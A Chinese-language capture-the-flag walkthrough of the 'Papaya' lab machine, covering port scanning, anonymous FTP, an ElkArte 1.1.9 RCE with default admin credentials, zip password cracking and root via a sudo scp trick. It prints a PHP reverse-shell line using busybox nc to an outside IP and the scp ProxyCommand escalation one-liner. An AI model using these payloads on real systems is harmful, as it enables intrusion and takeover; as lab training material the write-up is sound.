Papaya

image-20260430134934-1b8lww8

信息搜集

192.168.3.56

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
┌──(root㉿Eecho)-[~]
└─# rustscan -a 192.168.3.56 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.3.56:22
Open 192.168.3.56:21
Open 192.168.3.56:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.3.56
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-04-30 21:52 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Initiating ARP Ping Scan at 21:52
Scanning 192.168.3.56 [1 port]
Completed ARP Ping Scan at 21:52, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 21:52
Scanning papaya.thl (192.168.3.56) [3 ports]
Discovered open port 22/tcp on 192.168.3.56
Discovered open port 80/tcp on 192.168.3.56
Discovered open port 21/tcp on 192.168.3.56
Completed SYN Stealth Scan at 21:52, 0.02s elapsed (3 total ports)
Initiating Service scan at 21:52
Scanning 3 services on papaya.thl (192.168.3.56)
Completed Service scan at 21:52, 28.54s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against papaya.thl (192.168.3.56)
NSE: Script scanning 192.168.3.56.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:52
NSE: [ftp-bounce 192.168.3.56:21] PORT response: 500 Orden PORT ilegal
Completed NSE at 21:52, 16.72s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.45s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Nmap scan report for papaya.thl (192.168.3.56)
Host is up, received arp-response (0.00056s latency).
Scanned at 2026-04-30 21:52:08 CST for 47s

PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64
| fingerprint-strings:
| GenericLines:
| 220 Servidor ProFTPD (Debian) [::ffff:192.168.3.56]
| Orden incorrecta: Intenta ser m
| creativo
| Orden incorrecta: Intenta ser m
| creativo
| Help:
| 220 Servidor ProFTPD (Debian) [::ffff:192.168.3.56]
| 214-Se reconocen las siguiente
| rdenes (* =>'s no implementadas):
| XCWD CDUP XCUP SMNT* QUIT PORT PASV
| EPRT EPSV ALLO RNFR RNTO DELE MDTM RMD
| XRMD MKD XMKD PWD XPWD SIZE SYST HELP
| NOOP FEAT OPTS HOST CLNT AUTH* CCC* CONF*
| ENC* MIC* PBSZ* PROT* TYPE STRU MODE RETR
| STOR STOU APPE REST ABOR RANG USER PASS
| ACCT* REIN* LIST NLST STAT SITE MLSD MLST
| comentario a root@papaya
| NULL, SMBProgNeg, SSLSessionReq:
|_ 220 Servidor ProFTPD (Debian) [::ffff:192.168.3.56]
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 19 Jul 2 2024 secret.txt
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 bb:05:10:69:18:eb:e3:44:2c:a7:68:98:d0:97:01:20 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFnh3KAOtFRAIMsWOIip+Q2MGFR4A7t5/fzhF1o/JtYmsjB7J2/XOUpU1h1qI/rdXBe3SPBsWPLa/OnGcTlFT8I=
| 256 65:41:aa:54:a6:b7:f7:2a:04:2e:c4:6a:c0:4d:10:35 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAVKDRl7RIGDh3jSVkPcFll6/h+IR1UiiDICB2I1+xU8
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.59
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-favicon: Unknown favicon MD5: B9FF92880E63138F9B87035C95C15E9F
|_http-server-header: Apache/2.4.59 (Debian)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: My Community - Index
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.99%I=7%D=4/30%Time=69F35E8E%P=x86_64-pc-linux-gnu%r(NULL
SF:,35,"220\x20Servidor\x20ProFTPD\x20\(Debian\)\x20\[::ffff:192\.168\.3\.
SF:56\]\r\n")%r(GenericLines,97,"220\x20Servidor\x20ProFTPD\x20\(Debian\)\
SF:x20\[::ffff:192\.168\.3\.56\]\r\n500\x20Orden\x20incorrecta:\x20Intenta
SF:\x20ser\x20m\xc3\xa1s\x20creativo\r\n500\x20Orden\x20incorrecta:\x20Int
SF:enta\x20ser\x20m\xc3\xa1s\x20creativo\r\n")%r(Help,273,"220\x20Servidor
SF:\x20ProFTPD\x20\(Debian\)\x20\[::ffff:192\.168\.3\.56\]\r\n214-Se\x20re
SF:conocen\x20las\x20siguiente\x20\xc3\xb3rdenes\x20\(\*\x20=>'s\x20no\x20
SF:implementadas\):\r\n\x20CWD\x20\x20\x20\x20\x20XCWD\x20\x20\x20\x20CDUP
SF:\x20\x20\x20\x20XCUP\x20\x20\x20\x20SMNT\*\x20\x20\x20QUIT\x20\x20\x20\
SF:x20PORT\x20\x20\x20\x20PASV\x20\x20\x20\x20\r\n\x20EPRT\x20\x20\x20\x20
SF:EPSV\x20\x20\x20\x20ALLO\x20\x20\x20\x20RNFR\x20\x20\x20\x20RNTO\x20\x2
SF:0\x20\x20DELE\x20\x20\x20\x20MDTM\x20\x20\x20\x20RMD\x20\x20\x20\x20\x2
SF:0\r\n\x20XRMD\x20\x20\x20\x20MKD\x20\x20\x20\x20\x20XMKD\x20\x20\x20\x2
SF:0PWD\x20\x20\x20\x20\x20XPWD\x20\x20\x20\x20SIZE\x20\x20\x20\x20SYST\x2
SF:0\x20\x20\x20HELP\x20\x20\x20\x20\r\n\x20NOOP\x20\x20\x20\x20FEAT\x20\x
SF:20\x20\x20OPTS\x20\x20\x20\x20HOST\x20\x20\x20\x20CLNT\x20\x20\x20\x20A
SF:UTH\*\x20\x20\x20CCC\*\x20\x20\x20\x20CONF\*\x20\x20\x20\r\n\x20ENC\*\x
SF:20\x20\x20\x20MIC\*\x20\x20\x20\x20PBSZ\*\x20\x20\x20PROT\*\x20\x20\x20
SF:TYPE\x20\x20\x20\x20STRU\x20\x20\x20\x20MODE\x20\x20\x20\x20RETR\x20\x2
SF:0\x20\x20\r\n\x20STOR\x20\x20\x20\x20STOU\x20\x20\x20\x20APPE\x20\x20\x
SF:20\x20REST\x20\x20\x20\x20ABOR\x20\x20\x20\x20RANG\x20\x20\x20\x20USER\
SF:x20\x20\x20\x20PASS\x20\x20\x20\x20\r\n\x20ACCT\*\x20\x20\x20REIN\*\x20
SF:\x20\x20LIST\x20\x20\x20\x20NLST\x20\x20\x20\x20STAT\x20\x20\x20\x20SIT
SF:E\x20\x20\x20\x20MLSD\x20\x20\x20\x20MLST\x20\x20\x20\x20\r\n214\x20Env
SF:\xc3\xada\x20comentario\x20a\x20root@papaya\r\n")%r(SSLSessionReq,35,"2
SF:20\x20Servidor\x20ProFTPD\x20\(Debian\)\x20\[::ffff:192\.168\.3\.56\]\r
SF:\n")%r(SMBProgNeg,35,"220\x20Servidor\x20ProFTPD\x20\(Debian\)\x20\[::f
SF:fff:192\.168\.3\.56\]\r\n");
MAC Address: 08:00:27:A2:17:C8 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
TCP/IP fingerprint:
OS:SCAN(V=7.99%E=4%D=4/30%OT=21%CT=%CU=41449%PV=Y%DS=1%DC=D%G=N%M=080027%TM
OS:=69F35EB7%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=107%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Uptime guess: 39.372 days (since Sun Mar 22 12:57:55 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: Servidor, 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.56 ms papaya.thl (192.168.3.56)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.30 seconds
Raw packets sent: 26 (1.938KB) | Rcvd: 20 (1.563KB)
  • 21 FTP
  • 22 SSH
  • 80 WEB

写入hosts

1
192.168.3.56 papaya.thl

FTP

ftp前面rustscan扫描的时候已经发现了存在匿名登录。登录进去后里面有个secret.txt文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root㉿Eecho)-[~]
└─# ftp 192.168.3.56
Connected to 192.168.3.56.
220 Servidor ProFTPD (Debian) [::ffff:192.168.3.56]
Name (192.168.3.56:root): anonymous
331 Conexión anónima ok, envía tu dirección de email como contraseña
Password:
230 Aceptado acceso anónimo, aplicadas restricciones
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||48879|)
150 Abriendo conexión de datos en modo ASCII para file list
-rw-r--r-- 1 ftp ftp 19 Jul 2 2024 secret.txt
226 Transferencia completada
ftp> get secret.txt
local: secret.txt remote: secret.txt
229 Entering Extended Passive Mode (|||50994|)
150 Opening BINARY mode data connection for secret.txt (19 bytes)
100% |***************************************************************************| 19 5.04 KiB/s 00:00 ETA
226 Transferencia completada
19 bytes received in 00:00 (3.33 KiB/s)
ftp> ^D
221 Hasta luego
┌──(root㉿Eecho)-[~]
└─# cat secret.txt
ndhvabunlanqnpbñb

http

80端口是一个搭建了ElkArte的网站 ElkArte 是一款现代、强大的社区论坛建设软件。

image

且版本是1.1.9的这个版本存在RCE漏洞且可以使用默认凭证登录admin:password

exp https://www.exploit-db.com/exploits/52026

image

这里我上传的是反弹shell的文件而不是exp里面的

1
<?php exec("busybox nc 192.168.43.61 8888 -e /bin/bash");?>

image

提权

www -> papaya

/opt目录下存在一个pass压缩包

1
2
3
www-data@papaya:/opt$ ls
pass.zip
www-data@papaya:/opt$

解压的时候发现需要凭证。这里直接复制到kali进行爆破

1
2
3
4
5
6
7
8
9
10
www-data@papaya:/opt$ scp pass.zip root@10.200.70.98:/tmp/aaaa
The authenticity of host '10.200.70.98 (10.200.70.98)' can't be established.
ED25519 key fingerprint is SHA256:ZyUbPteDlhKgfFR102PGhJUWNS++vR62HchhPFY2Cfw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/var/www/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
root@10.200.70.98's password:
pass.zip 100% 173 117.8KB/s 00:00
www-data@papaya:/opt$
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root㉿Eecho)-[/tmp/aaaa]
└─# zip2john pass.zip > zip_hash2.txt
ver 2.0 pass.zip/pass.txt PKZIP Encr: cmplen=23, decmplen=11, crc=EEA46B01 ts=89BB cs=eea4 type=0
┌──(root㉿Eecho)-[/tmp/aaaa]
└─# ls
authorized_keys backup backup.zip lxd-alpine-builder pass.zip zip_hash2.txt zip_hash.txt
┌──(root㉿Eecho)-[/tmp/aaaa]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
jesica (pass.zip/pass.txt)
1g 0:00:00:00 DONE (2026-04-30 15:12) 50.00g/s 2457Kp/s 2457Kc/s 2457KC/s 123456..trudy
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(root㉿Eecho)-[/tmp/aaaa]
└─#

成功获取到凭证,并解压

1
2
3
4
5
┌──(root㉿Eecho)-[/tmp/aaaa]
└─# cat pass.txt
papayarica
┌──(root㉿Eecho)-[/tmp/aaaa]
└─#

横向移动到papaya用户

1
2
3
4
5
www-data@papaya:/opt$ su papaya
Password:
papaya@papaya:/opt$ id
uid=1000(papaya) gid=1000(papaya) grupos=1000(papaya),100(users)
papaya@papaya:/opt$

papaya -> root

可以使用scp进行提权gtfobins上有现成的提权方案

https://gtfobins.org/gtfobins/scp/

1
2
3
4
5
6
7
8
9
10
11
papaya@papaya:/opt$ sudo -l
Matching Defaults entries for papaya on papaya:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User papaya may run the following commands on papaya:
(root) NOPASSWD: /usr/bin/scp
papaya@papaya:/opt$ sudo /usr/bin/scp -o 'ProxyCommand=;/bin/sh 0<&2 1>&2' x x:
# id
uid=0(root) gid=0(root) grupos=0(root)
# /bin/bash -p
root@papaya:/opt#